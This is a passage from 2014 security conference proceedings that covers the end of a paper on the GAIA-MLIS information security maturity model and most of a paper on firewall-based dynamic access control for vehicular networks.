The organization should always conduct audits at
intervals of predetermined time in order to ascertain whether
the control objectives, processes and procedures are meeting
the security requirements of information identified, and if all
objectives are maintained and implemented by executing
them as expected. Control Objectives for Information and
Related Technology (COBIT) aims to help businesses create
an ideal value, referring to the IT sector, balancing and
maintaining the resources from this area. Thus, COBIT
version 5 allows organizations to manage their resources in
a holistic way, with the goal of an end-to-end IT and
functional areas considering both internal and external
interest business [9].
For the development of a model of maturity level in
information security, COBIT serves as a helper tool. Thus,
the asset information gains importance in verifying the
actual efficiency of the resources used for protection and
obtaining a level of acceptance that is risky or not for the
organization, since the information and its security must be
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
established during the process of governance. The COBIT
maturity model is used as basis for the GAIA-MLIS
maturity model.
Information, systems, processes that support the
organization, and even computer networks, are important
assets to the organization's business. With the view to ensure
greater competitiveness and visibility, the security
information assets should be reviewed each time period and
verified whether the initial planning is under execution or,
the initial idea does or does not comply with the reality of
the organization [7].
It is a fact that organizations often undergo various types
of threats to their systems and computer networks, which
may include, espionage, malicious persons within the
enterprise and electronic fraud [11]. It is well known that
organizations should understand the need for improvements
in regards to risks they face and what targets and plans are
in place [10].
Information security is important for any organization,
whether a public agency with a model of electronic
government (e-gov), or for a private enterprise [11].
Many systems are not designed for security. Some
organizations do not have appropriate processes and
procedures. It is essential that the requirements of
information security are identified, analyzed and monitored,
so that through continuous improvement, targets relating to
information and its security are being met.
It is important to evaluate and establish a standard on an
enterprise maturity level, so that both can be used to
research through questionnaire or the construction of
baselines about characteristics related to the use of
technology. The use of baseline, or digital signature, has
been used, for example, for establishment of standard and
profile to network usage, as may be viewed in [21] and [22].
The standards ISO / IEC 27001:2005 and 27002:2005
aim to help IT managers and others, to establish what the
security requirements are for the information which should
be adopted. The standards serve as a guideline to develop
practices and procedures for information security and assist
in confidence building activities focusing on interorganizational guidelines [19] [20].
III.
MODEL OF GAIA-MLIS
Information is considered by many organizations as the
asset which causes the most concern [13]. Defined processes
help managers and employees to identify the requirements
for decision making in order to protect all assets related to
information [14].
The GAIA-MLIS maturity model aims to evaluate the
level of maturity in information security and examines five
areas, which are: Hardware, Software, Staff, Facilities and
Information. All these areas are related to information.
Through this model, organizations can verify the level of
maturity in information security, identify if there is any
deficiency and correct it in order to implement the
improvement.
51
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 1 shows that the information has a centralizing
role among all assets. Keeping information secure is one of
the most difficult challenges that organizations have. Given
that, many resources and processes should be measured by
GAIA-MLIS model.
Figure 1. Relationship Areas.
A. Maturity Level GAIA-MLIS
Organizations are concerned with constant intrusions
into computer systems. Processes in information security
should be stored in environments that require more efficient
security not only in computational media, but also in the
physical environment with committed employees and a
series of rules and procedures laid down in order to protect
their information assets.
Since this procedure is not always carried out by the
companies, along with the lack of knowledge of the
importance of information, or non-commitment from the
directors to the other employees, the creation of tools able to
verify the security level of information is necessary for
organizations. Thus, the GAIA-MLIS, model aims to
analyze the level of maturity in information security in a
particular company.
Through GAIA-MLIS, companies can verify what their
weaknesses are in relation to information security and what
targets they need to meet to achieve a certain level of
information security. Through continuous planning,
corporations can use the model in order to check whether
goals are being met. The proposed model has five levels of
maturity, which are goals and objectives describing what
should be achieved by companies regarding the information
security with a fully managed process.
The maturity model GAIA-MLIS is based on
recommendations of COBIT 5 [9] and ISO / IEC 27001 [10]
and 27002 [11] standards. The GAIA-MLIS maturity levels
are described below.
Level 0, no insurance: Processes are not defined in
information security. There are no defined responsabilities
for information security policies. Employees and partners
are unaware or are not trained with awareness programs on
the importance of information security. Employees, partners
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
and third parties do not suffer disciplinary proceedings upon
the discovery of an information security incident. Shutdown
policy of employees, partners and third parties policies are
not applied upon termination and the return of
organization’s information assets. There is no security or
access control defined process. Physical facilities are
unsecured. There is no protection of equipment against
external threats, whether human or environmental. There is
no an efficient management for the network, avoiding or
minimizing loss, damage or theft to information assets.
Asset information is not encrypted. There is no backup
policy with copies stored in monitored environments with
access control in an environment protected against external
threats. Inventories of assets are not identified and there are
not established or documented. There are no classificaions
of the importance and values of information.
Level 1, entry level insurance: Some processes are
defined in information security. There are no defined sets
for information security. Staff and partners are unaware or
are not trained with awareness programs on the importance
of information security. Employees, partners and third
parties do not face disciplinary proceedings upon the
discovery of a security incident information. Shutdown of
employees, partners and third parties policies are applied
haphazardly when closing the active. There is no security
and access control process defined. Physical facilities are
unsecured. There is some equipment protection against
external threats, whether they are human or environmental.
There is a basic management for the network without
defined processes to avoid or minimize loss, theft or damage
to information assets. Asset information is not encrypted.
There are backup policy, but there are no copies stored in
environments with access control, monitored and protected
from outside threats. Assets inventory are not identified and
are no established or documented. There are no
classifications of the importance and values of information
assets.
Level 2, regular insurance: Processes are defined in
information security. There are few sets of defined
responsibilities for information security. Staff and partners
know, but they are not trained in awareness programs on the
importance of information security. Employees, partners and
third parties do not suffer disciplinary proceedings when
some information security incidents are discovered.
Shutdown of employees, partners and third parties policies
are applied haphazardly when closing the active. There are
some control access security set. Physical facilities are
unsecured. There is some equipment protection against
external threats, whether they are human or environmental.
There is a basic management for the network without
defined processes to avoid or minimize loss, theft or damage
to information assets. Asset information is not encrypted.
There are backup policy, but there are copies stored on
environments without monitoring, access control and
external threat. Inventories of assets are identified and
established, but are not documented. There are no
52
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
classifications of the importance and values of information
assets.
Level 3, partially safe: Processes are defined in
information security and there are sets of defined
responsibilities for information security. Staff and partners
are trained in awareness programs on the importance of
information security. Employees, partners and third parties
sufferers disciplinary proceedings when an information
security incident is discovered. Shutdown of employees,
partners and third parties are partially documented. There is
security and access control procedures defined. Physical
facilities are protected. There is some equipment protection
against external threats, whether they are human or
environmental. There is an efficiently network managed,
with some defined processes to avoid or minimize loss, theft
or damage to information assets. Asset information is
encrypted. There are backup policies and the copies are
stored in monitored environments with access control and
with protected against external threats to the environment.
Inventories of assets are identified and established, but they
are partially documented. There are classifications of the
importance and values of information assets are partially
documented.
Level 4, fully insured: Processes are defined in
information security. Sets of responsibilities defined by
security policy information. Staff and partners are trained in
awareness programs on the importance of information
security. Employees, partners and third parties sufferers
disciplinary proceedings when an information security
incident is discovered. Shutdown policies of employees,
partners and third parties are totally documented. Access
control are defined. Physical facilities are protected. The
facilities are protected against external threats, both human
and environmental. There is an efficient network
management, avoiding or minimizing loss, damage or theft
to information assets. Asset information is encrypted. There
are backup policies and the copies are stored in monitored
environments with access control and with protected against
external threats to the environment. Inventories of assets are
identified, established and registered. There are
classifications established and the importance and values of
information assets fully documented.
The maturity levels possess the following percentages:
Level 0 has a percentage from 0% to 35%; Level 1 from
36% to 55%; Level 2 from 56% to 75%; Level 3 from 76%
to 85%; and Level 4 above 85%. The percentages were
assigned as described metrics of security levels. The
empirical study was carried out to create an evaluation
model for information security by analyzing the areas
(hardware, software, staff, facilities and information), and
these weights are an adaptation to what is suggested in the
groups of ISO/IEC 27002. As observed, the levels are
described as the overall organizational structure an
organization might have, due to their maturity in
information security. It is noteworthy that, through
measurements of the formal model to assess GAIA-MLIS,
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
organizations can plan and check the weaknesses in security
processes.
The five ares (Hardware, software, facilities, staff and
information) on GAIA-MLIS is addressed as in ISO/IEC
27002 standard. We may relate the areas of ISO/IEC 27002
(security policy, organizing information security, asset
management, human resources security, physical and
environmental security, communications and operations
management, access control, information system
acquisitions, development and maintenance, information
security incident management, business continuity
management and compliance) with five areas of GAIAMLIS.
The evaluation will provide all companies, whether
public or private, the ability to measure, manage and verify
the asset information and use metrics to target higher levels
by structuring its processes according to their needs and
realities. Thus, the results obtained by supplementation of
data areas provide greater control of the process used in
information security, as well as manage the risks that
organizations are subjected to every day.
IV.
TESTS AND RESULTS
As means to verify and validate the maturity model
GAIA-MLIS, three organizational structures were analyzed.
The companies were not divided into sectors groups (service
provider, bussiness company, etc), because we wanted to
have a general sampling.
A questionnaire with thirty questions was administered in
order to identify strengths and weaknesses in the processes
of the five areas. The objective of the questions is to
perform a diagnostic analysis of each area (hardware,
software, people and facilities). The questions were
developed based on the suggested groups of ISO/IEC 27002.
There are five questions for the groups hardware, software,
people and facilities, and ten questions related to the
information area. The diagnose performed involves the
application evaluation of security requirements related to
policies and rules on the five suggested areas, assessing the
investment degree and the use of technologies to guarantee
each one of these areas. The weights of the questions were
defined in an empirical way, and the information area has a
higher number of questions than the other areas due to the
fact that it is the analysis focus of the model. The mentioned
areas have an assigned weight of: 30% for information, 25%
for hardware, 25% for software, 15% for employees and 5%
for facilities. These weights are an adaptation to what is
suggested in the groups of ISO/IEC 27002.
Figure 2 below is a comparison of results from the
analysis of different companies.
53
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
(hardware, software, staff, facilities and information),
aiming to formalize metrics and levels of security. It creates
value, in the sense that it allows for planned investments and
formal documentation, defining standards and procedures
for IT processes.
V.
Figure 2. Results.
According to figure 2, Company 1 and 2 are at Level 1
maturity in information security. Meanwhile, Company 3 is
at Level 2. Results show that the software area has more
investment than others and facilities area has the lowest
investment. A monitored environment may be able to inhibit
harmful actions caused by employees or people who do not
work in the organization. However, if the company does not
provide training in accordance with the rules and
punishments applied to employees, they face the risk of
information security threats caused by internal factors.
These results indicate that there are more weaknesses
than strengths in processes of the assessed networks, leaving
companies with a level of information security level which
is fragile and more susceptible to certain information
security situations. Thus, companies should check and
improve their processes, and directors may have GAIAMLIS system as an analysis tool.
The system has proved to be efficient in indicating what
level of maturity in information security the companies fall
under. Figure 3 shows the trend lines for the three
companies analyzed. These lines show their current status.
Thereby, the results obtained in the tests enable defined
strategies for improving processes and also indicate what
their weaknesses are.
Figure 3: Tendency.
CONCLUSION
We presented the GAIA-MLIS model that aim to analyze
maturity level for information security in enterprise,
observing five areas (hardware, software, staff, facilities and
information) through a diagnostic evaluation. We used three
enterprise as object of analysis and we may see strengths and
weaknesses in their areas of safety. With the results, we may
evaluate what are the strengths and weaknesses of enterprise
in each area, and what needs investments to improve the
information security level.
The model helps organizations focus their efforts to solve
specific problems in each one of the areas where the
diagnostic evaluation identified a problem. The questionnaire
application allows the exact identification of the area that
needs investments in order to strengthen the security and,
thus, improve the maturity level of the organization.
The flexibility of the analysis demonstrates that GAIAMLIS system is able to state clearly the needs of each
evaluated area. With the obtained results, the CIOs discuss
the investment needs for all evaluated areas. Therefore, the
CEO knows that the organization must change or create new
policies and targets in order to aim at a better standard for the
level of information security, demonstrating to partners and
customers their concern with the integrity of all company
assets, mainly with information.
Companies should establish policies and goals to aim for
a higher level of security. GAIA-MLIS system provides
companies metrics to identify the strengths and weaknesses
of the processes. Investment in equipment and software
techniques are important. However, if employees are not
committed and if there is no a physical infrastructure able to
protect the information assets, the organization will not be
able to provide security for its network.
The proposed model achieved its objective of performing
a security diagnosis evaluation, more specifically in
hardware, software, people, facilities and information. It also
helps the organizations on focus efforts to solve specific
problems in each one of the areas in which the diagnostic
evaluation found a problem.
An advantage of the model is the simplicity and the fast
way with which it evaluates and diagnoses security maturity
levels on the proposed subareas.
The corrective actions are directed according to the result
of the diagnostic evaluation, and they aim to define policies
of investment and adjustment on the analyzed areas in order
to improve the information security.
In future works, we intend to analyze other companies
separated by sector (service provider, public agencies, etc),
aiming to adjust and improve the results according to
characteristics common to organizations.
The GAIA-MLIS model contributes to a better
management of information assets, analyzing five areas
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
54
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
ACKNOWLEDGEMENTS
This work was supported by: SETI/Fundação Araucária
and MCT/CNPq for Betelgeuse Projects’ financial support.
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
[20]
R. V. Solms, K. L. Thomson and P. M. Maninjwa, “Information
security governance control through comprehensive policy
architectures”, Proc. IEEE ISSA, IEEE Press, Aug 2011, pp 1-6.
X. Yuan, Y. Zhou and Z. Qian, “Information Security of Power
Corporations and its Reinforcement Measures”, Proc. IEEE CICED,
IEEE Press, Sep 2012, pp 1-7.
P. I. Wang, “Information Security Knowledge and Behavior: An
Adapted Model of Tecnology Acceptance”, Proc. IEEE ICETC, IEEE
Press, June 2010, pp v2-364 – v2-367.
L. Qingguo and Z. Wei, “Strengthen Militaru Academy’s Information
Security Management”, Proc. IEEE MINES, IEEE Press, Nov 2009,
pp 182 – 186.
J. Zhang, W. Yuan and W. Qi, “Research on Security Management
and Control System of Information System In IT Governance”, Proc.
IEEE CSSS, IEEE Press, Jun 2011, pp 668-673.
P. Weill and J.W. Ross, IT Governance: How top performers manage
IT decision rights for superior results, Boston: Harvard Business
Press, 2004.
M. Sajko and N. Hadjina, “Information Security Governance and
How to Accomplish it”, Proc. IEEE MIPRO, IEEE Press, May 2011,
pp 1516 – 1521.
K. Sun, S. Jajodia, J. Li, Y. Cheng, W. Tang and A. Singhal,
“Automatic Security Analysis Using Security Metrics”, Proc. IEEE
MILCOM, IEEE Press, Nov 2011, pp 1207-1212.
ISACA, COBIT 5, A Business Framework for the Governance and
Management of Enterprise IT. ISACA. 2012.
ISO/IEC, Information technology – Security techniques – Information
security management system - Requirements. ISO/IEC. 1ed. 2005.
ISSO/IEC, Information technology – Security techiniques – Code of
practice for information security management. ISO/IEC. 1ed. 2005.
M. Moyo, H. Abdullah and R. C. Nienaber, “Information Security
Risk Management in Small-Scale Organisations: A Case Study of
Secondary Schools Computerised Information Systems”, Proc. IEEE
ISSA, IEEE Press, Aug, 2013, pp 14 – 16.
L. Hong-li and Z. Ying-ju, “Measuring effectiveness of information
security management”, Proc. IEEE CNMT, IEEE Press, Jan, 2009, pp
1 -4.
M. Ratchakom and N. Prompoon, “A Process Model Design and Tool
Support for Information Assets Access Control using Security
Patterns”, Proc. IEEE JCSSE, IEEE Press, May, 2011, pp 307 – 312.
M. Simonsson and P. Johnson, “The IT organization modeling and
assessment tool: Correlating IT governace maturity with the effect of
IT”, Proc. IEEE HICSS, IEEE Press, Jan, 2008, pp 1 – 10.
L. Krautsevich, F. Martinelli and A. Yautsiukhin, “Formal Analysis
of Security Metrics with Defensive Actions”, Proc. IEEE UIC/ATC,
IEEE Press, Dec, 2013, pp 458 – 465.
A. Chakraborty, A. Sengupta and C. Mazumdar, “A Formal Approach
to Information Security Metrics”, Proc. IEEE EAIT, IEEE Press, Dec,
2012, pp 439 – 442.
B. Karabey and N. Baykal, “Information Security Metric Integrating
Enterprise Objectives”, Proc. IEEE ICCST, IEEE Press, Oct, 2009, pp
144 – 148.
J. Anttila, K. Jussila, J. Kajava and I. Kamaja, “Integrating ISO/IEC
27001 and other managerial discipline standards with processes of
management in organizations”, Proc. IEEE ARES, IEEE Press, Aug,
2012, pp 425 – 436.
A. Iqbal, D. Horie, Y. Goto and J. Cheng, “A Database for Effective
Utilization of ISO/IEC 27002”, Proc. IEEE FCST, IEEE Press, Oct,
2009, pp 607 – 612.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[21] E. Gomede, M. L. Proença JR and R. M. Barros, “Networks Baseline
and Analytic Hierarchy Process: An Approach to Strategic
Decisions”, IADIS International Conference Applied Computing
2012, 2012, Madrid. Processing of IADIS International Conference
Applied Computing 2012. Madrid, 2012. p. 34-41.
[22] M. L. Proença JR, C. Coppelmans, M. Bottoli and L. S. Mendes,
“Baseline to help with network management”, ICETE 2004 –
Springer. (Org.). e-Business and Telecommunication Networks.
Dordrecht: Springer, 2006, v. 1, p. 158-166.
55
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Security of Vehicular Networks:
Static and Dynamic Control of Cyber-Physical Objects
Vladimir Muliukha, Vladimir Zaborovsky, Sergey Popov
Telematics department St.Petersburg Polytechnic University
Saint-Petersburg, Russia
Email: vladimir@mail.neva.ru, vlad@neva.ru, popovserge@spbstu.ru
Abstract—The modern vehicle has long ceased to be a pure
mechanical device. Each year data-processing component of the
car is becoming more important. Considering the vehicle as the
dynamic cyber-physical object in non-deterministic environment,
we propose to use the methods of cloud services information
security to solve the problem of access control to the cars
telematics network. We propose to use a real-time control for
each of these aspects, which is a complex technical challenge
with static and dynamic interactions. The paper proposes a
solution for implementing access control for vehicular networks.
It is done by firewalls using dynamic access approach, based
on virtual connections management, and algebra of filtering
rules with mechanism of traffic filtering in ”stealth” mode.
The proposed security monitor architecture allows to enforce
dynamic access policy depending on static set of firewall filtering
rules and current condition of virtual connections and network
environment.
Keywords–Security; Vehicular network; Cyber-physics objects;
Dynamic access control; Virtual connections.
I.
I NTRODUCTION
Information systems are deeper entering our lives, integrating with various purely physical systems. For example, a
modern car is no longer a mechanical device. After enabling
cyber component to all internal circuits and vehicular communications, it can be assigned to the new class – Cyberphysical
objects. And each year this ”cyber” component of the car is
becoming more and more important.
In order to simplify the driving, more and more systems in
the car become automated. Lots of the remaining mechanical
systems in a modern car are controlled by computer via the
Controller Area Network (CAN), but not directly by the driver.
According to the researches, modern vehicles comprise up
to 60-70 Electrical Control Units (ECUs). The ECUs serve
a multitude of purposes like monitoring and controlling the
different subsystems of a car [1][2].
Many of ECUs are connected together by the controller
area network bus. Now, CAN is the most frequently used
protocol in automotive networks, other protocols, designed to
fit specific uses may also be used, such as Local Interconnect
Network (LIN), Media Oriented Systems Transport (MOST) or
FlexRay [1]. Such bus and ECUs form telematics network and
serve as information and communication system of the modern
vehicle. In modern vehicles, most of important functions are
realized by telematics network. It measures vehicle’s speed and
revolutions per minute or informs the driver and other systems
when an accident is about to occur and so on.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The world’s largest automobile manufacturers are developing further, integrating in modern vehicles, more and more
software and hardware to provide the owner and the driver
of the car a maximum number of different digital services,
including the remote ones.
According to the joint project of the Ford Motors Company
and Saint-Petersburg State Polytechnical University, we suggest that in the near future, all new cars should be integrated
into a single information service network and should be able
to communicate with other cars and external sources, via
USB, Bluetooth, WiFi, 3Gm and Long-Term Evolution (LTE)
networks.
Digital revolution allows vehicles to significantly extend
their functionality. Security means have to evolve together
with cars. From 1960s to 2010s, vehicular security devices
developed from mechanical through electromechanical and
electronical to software based systems [3]. In the next few
years, the car will be part of a single information and service
space – cyber-physical object operating in the information
space, which will result in a new class of security threats.
For several years, experts concerned with vehicular information security by hacking CAN network and replacing data
from controllers. But, while maintaining speed and trends for
Automotive Research in the near future, the hacking would be
done remotely. This can lead to very bad consequences from
data theft to a carjacking or damage the vehicle itself.
Thus, the issue of cars information security as the new
class of cyber-physical systems that combine mechanical and
electronic components is one of the most important issues of
the vehicular networks.
The article describes cars as the new class of systems that
combine the mechanical part and logical information, so-called
cyber-physical objects. The security of information services
for networks of cyber-physical objects is based on the access
control technology.
The paper is organized as follows: In Section II, we
consider the vehicle as the cyber-physical object. In Section III,
we discuss security aspects of mobile cyber-physical networks
using cloud computing security approaches. Section IV contains main aspects of the dynamic access control enforcement
in computer networks. And in Section V, we suggest an
architecture of a secure cloud computing environment. Section
VI concludes the paper.
56
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
II. V EHICLES AS THE CYBER - PHYSICAL OBJECTS
In the near future, new generation of vehicles will be
created. Such cars would be able to receive, store, and transmit
information about their surrounding environment, which will
be used during their operations. Information will be transmitted
between such objects, between car and information center and
also between the vehicle and the driver.
In our work, for the formalization of vehicular networks we
use Cyber-Physical (CPh) approach, which extends the range
of engineering and physical methods for a design of complex
technical objects by researching the informational aspects of
communication and interaction between objects and with an
external environment.
The selection of CPh systems as a special class of designed objects is due to the necessity of integrating various
components responsible for Computing, Communications, and
Control (3C) processes. Although in modern science there
are different approaches to the use of information aspects
of the physical objects, but only within cybernetics, such
approaches have had structural engineering applications. The
conceptual distinction between closed and open systems in
terms of information and computational aspects requires the
use of new models, which take into account the characteristics
of information processes that are generated during the driving
of the vehicle and are available for monitoring, processing, and
transmission via computer network.
According to Figure 1, a CPh model of a vehicular
control system can be represented as a set of components,
including following units: information about the characteristics
of the environment (Observation), analysis of the parameters
of the current state for the controlled object via CAN or
telematics network (Orientation), decision-making according
to the formal purpose of functioning (Decision), organization and implementation of the actions that are required to
achieve the goal (Action). The interaction of these blocks
using information exchange channels allows us to consider
this network structure as a universal platform. Such platform
allows us to use various approaches, including new algorithms
and feedback mechanisms for the goals restrictions entropy
reduction or the reduction of the internal processes dissipation.
the structure of such control system can quickly be adjusted
according to the current information about the internal state
of the object and the characteristics of the environment, which
are in a form of digital data. Reported features open up the
new prospects for the development of intelligent vehicular
cyber-physical systems that will become in the near future
an integral part of the human environment in the information
space ”Internet of Things.” According to the estimates [4],
network-centric cyber-objects in the global information space
of the Internet will fundamentally change the social and
productive components of people’s lives. That will accelerate
of the knowledge accumulation and the intellectualization
for all aspects of the human activity. However, this process
requires not only innovative engineering ideas, but also the
development of scientific concepts uniting universal scientific
paradigm. Within this paradigm, for every CPh object like car,
the information should be considered as a fundamental concept
of objective reality, in which physical reality has ”digital”
basis and therefore is computable. The idea of integrating the
physical concepts with the theory of computation has led to
the new conceptual schema for nature descriptions, known
as ”it from bit” [5]. In this scheme, all physical objects,
processes, and phenomena of nature, which are available to be
read and understood by a person, are inherently informational
and therefore they are isomorphic to some digital computing
devices. Within this paradigm information acts as an objective attribute of matter that characterizes the fundamental
distinctiveness of the potential states of the real object. The
distinctiveness, according to the Landauers principle [6], is an
energy factor of the objects states and that is why it gives an
explanation of what are the states and how they are perceived
by other objects. This distinctiveness appears while creating
the systems that are capable to ensure the autonomy of the
existence during the interaction with the external environment
by the self-reproduction of its characteristics. It should be
noted that on the way to the wide-spread use of ”digital
reality” for the control problems, there are some limitations
that reflect the requirements for the existence of the special
state of physical objects reflecting its changes as a result
of the information exchange processes. So, cyber-physical
approach now often used to describe the properties of the socalled non-Hamiltonian systems in which the processes of selforganization are described by dissipative evolution of the density states matrix. However, the cyber-physical methodology
may be successfully used to create complex robotic systems,
the components which are capable for reconfiguration as the
result of transmitting and processing digital data or metadata.
The control and security tasks that are considered in this paper
cover the actual scope of the cyber-physical approach, which
is the basis of cloud computing technology and develop the
methodology of cybernetics in the direction of the metadata
control.
Figure 1. Cyber-physical model of vehicular control system.
Centric solutions allow using universal means for the
organization of information exchange to integrate different
technologies for the both observed and observable components
of the control system. The main differences between these
observed and observable components are the property ”part
whole” (for observed components) and the ratio ”system
environment” (for the observable ones). The parameters and
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
III. S ECURITY ASPECTS OF CYBER - PHYSICS SYSTEMS
Modern technical systems have clear boundaries separating
them from the environment or other objects and systems.
Therefore, the description of the processes in such systems
is local and the change of its state can be described by the
laws of physics, which are, in its most general form, the
deterministic form of the laws of conservation, for example,
energy, mass, momentum, etc. The mathematical formalization
57
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
of these laws allows to computationally determine the motion
parameters of the physical systems, using position data on the
initial condition, the forces in the system and the properties
of the external environment. Although the classical methodology of modern physics, based on abstraction of ”closed
system” is significantly modified by studying the mechanisms
of dissipation in the so-called ”open systems”, but such an
aspect of reality as the information is still not used to build
the control models and to describe the properties of complex
physical objects. In the modern world, where the influence of
the Internet, supercomputers, and global information systems
on all aspects of the human activity becomes dominant, accounting an impact of information on physical objects cannot
be ignored, for example, while realizing sustainability due to
the information exchange processes. The use of cyber-physical
methods becomes especially important while studying the
properties of systems, known as the ”Internet of Things” [6][7],
in which robots, network cyber-objects, and people interact
with each other by sharing data in the single information
space for the characterization of which are used such concepts
as ”integrity”, ”structure”, ”purposeful behavior”, ”feedback”,
”balance”, ”adaptability”, etc.
The scientific bases for the control of such systems were
called Data Science. The term ”Big Data” describes the process
of integration technologies for digital data processing from the
external physical or virtual environment, which are used to
extract useful information for control purposes. However, the
realization of the Data Science potential in robotics requires
the creation of new methods for use the information in control
processes, based on sending data in real time at the localization
point of moving objects (the concept of ”Data in motion”).
In general, the ”Big Data” are characterized by a combination of four main components (four ”V”): volume, variety,
velocity, and value. The general ”V” is visibility of data and
it is also a key defining characteristic of Big Data.
As a result, ”Big Data” in modern science has become a
synonymous for the complexity of the system control tasks,
combining such factors of the physical processes that characterize the volume, velocity, variety, and value of data generated
by them.
The security of CPh systems like vehicles is more complex
task than access control in stationary local network. The cars
move constantly changing the network configuration. Security
policy enforcement requires data about permissions and prohibitions, as well as the current localization of the car and the
route to it. Thus, while ensuring the information security of the
vehicular network, we have to consider the static and dynamic
aspects. This task is very similar to the information security of
cloud services, where is regular migration of virtual machines
from one physical platform to another to optimize the structure
of the cloud and a hardware load balance.
The virtual computing environment allows us to create
applications’ service-oriented network of virtual devices. Any
vehicle involved in the information exchange has its own
virtual ”avatar” in a high cloud environment. This virtual
”avatar” of the car has all the information from the real
object and the data obtained from other ”avatars” in a virtual
environment. Information exchange and required calculations
are done in the secure virtual environment.
Localization of computing and data collected can accelerate
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
the process of information processing and decision making.
After that, the data is transmitted to the driver on the car for
a final decision.
IV.
DYNAMIC ACCESS POLICY USING FIREWALL
FILTERING RULES
The implementations of vehicular network security are far
from simple due to the dynamic nature of network environment
and users activity [7][8][9].
Figure 2. Security conveyor architecture.
Specific threats for the vehicular network are attacks affecting data integrity and availability of the car systems. An
attacker often prefers not to steal any information out of the
car but to modify it, thus tricking the various systems of the
auto. Attack on availability can significantly hamper the work
of the car, cutting off some of its devices from the information
exchange process.
This specificity requires the use of specialized protective
equipment. The main thread is while attacking the integrity of
the information, the attacker can spoof the signals from the
remote control signal, for example, acting as the owner and
steal the vehicle.
In vehicular network, every second, hundreds of users and
telematics devices establish new virtual connections [10] with
distant resources and services. According to the mandatory
security policy, if we have N users, M resources and these
numbers are big, than we have to create a huge access N*M
matrix. And each element of this matrix will be a vector of
parameters and attributes, describing one virtual connection.
Vehicles and resources of course can be grouped according to
their rights and context, but in either case such matrix is too
big to be processed efficiently in real-time.
We propose the architecture of security conveyor (see
Figure 2), which consists of several filtering stages. At the first
stage when a connection is established there is a classical static
packet filter, which reject prior harmful traffic that corresponds
local telematics devices of the car. The second stage enforces
more accurate dynamic aspect of the access policy. Doing it
the dynamic firewall have to take into account that the network resources can change their context any moment without
informing our security conveyor. That is why we propose to
use some prior information about remote users and resources
in firewall to enforce security policy. Such information should
be received from databases and services outside of our security
monitor.
58
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
2)
3)
4)
Storage of virtual machines and user data;
Cluster controller;
Cloud controller.
The distributed computing environment intended for solving scientific and engineering problems is a set of various
computing resources, such as virtual machines, and has the
following features [12]:
1)
2)
3)
4)
Figure 3. Dynamic access control approach.
In computer networks, information is transmitted in the
form of packets. Each of these packets has some part of message in it. All network devices such as vehicular transmitters
and firewalls have to operate with these packets. According
to Figure 3, every access rule can be considered as one or
more informational virtual connections (1) specifying action
as ”access”, ”read”, ”write”, and so on. Then, we have to
determine what does this record mean to telematics devices,
how can the vehicle and requested information resource be
described. To answer these questions, our security monitor
has to use some prior outside information from specialized
databases and services (2). Using such information we receive
one or more Technological Virtual Connections (TVCs) from
initial informational virtual connections [10]. Then, all these
TVCs rules should be transformed into the requirement to the
packet filter. At this stage, we use different transport protocols
state machines to receive information about packet sequences
(3). If all these procedures will be applied to each established
virtual connection well receive huge amount of filtering rules.
That is why at the next stage, we propose to optimize the set
of filtering rules using specialized algebra of filtering rules (4)
[11]. Only optimized set of filtering rules can be processed in
real-time by firewall to enforce access policy (5).
V.
The environment is used by a wide range of users,
who are solving problems of different classes;
Virtual machines of different user groups can operate
within one hypervisor;
Wide range of software components (ComputerAided Design (CAD)/Computer-Aided Engineering
(CAE) applications, development tools) and operating
systems is used;
Different hardware configurations are used, including
virtual multicore computing machines and virtual machines, which allow performing computations using
the streaming technology Compute Unified Device
Architecture (CUDA).
Virtualization node is the hypervisor software which runs
on powerful multicore computing node. In virtualization, the
domain level 0 (dom0 in terms of hypervisor XEN or service
console in terms of other hypervisors) and virtual computing
machines (domain level U, domU) operate.
For information security and Access Control (AC) between
the virtual machines that operate under a single hypervisor, the
internal (”virtual”) traffic and the external traffic (incoming
from other hypervisors and from public networks) must be
controlled. The solution of the access control problem could
be achieved through the integration of a virtual firewall into the
hypervisor; this firewall would functions under the hypervisor,
but separately from the user virtual machines. The virtual
firewall domain can be defined as ”security domain” (domS).
Invisible traffic filtering is an important aspect of the network
monitoring; the firewall must not change the topology of the
hypervisor network subsystem. This can be achieved by using
”Stealth” [12] technology, which is a packet traffic control
invisible to other network components.
A RCHITECTURE OF A SECURE CLOUD COMPUTING
ENVIRONMENT
During the researches at the Telematics department of SPbSPU, we proposed architecture of a secure cloud computing
environment. This architecture considers dynamic nature of
cloud environment and is suitable for description of vehicular
networks.
A distributed computing environment (cloud system) consists of the following software and hardware components:
1)
Virtualization nodes;
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 4. Secure cloud architectrure.
Figure 4 shows the common architecture of a distributed
cloud system with integrated AC components. The following
abbreviations are used: hardware FireWall (FW); Virtual FireWall (VFW); the Central Control System of all Firewalls in
59
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
the cloud (FSCS); Virtual Machine (VM); CLoud Controller
(ClC); Cluster Controller (CC); Storage Controller (SC).
The FSCS distributes the access control policies to all
firewalls in the system. When the information security policy
changes, new access rules are replicated to all components. The
security domain isolates virtual machines from the hypervisor,
which prevents the possibility of attack against the hypervisor
inside the cloud. The hardware firewall isolates the private
cloud components from the external threats.
The joint use of hardware and software firewall and intrusion detection system, based on the prediction of the driver’s
and vehicular’s behavior and the vehicular network state will
reduce the risks of invasion in a car network. Using a virtual
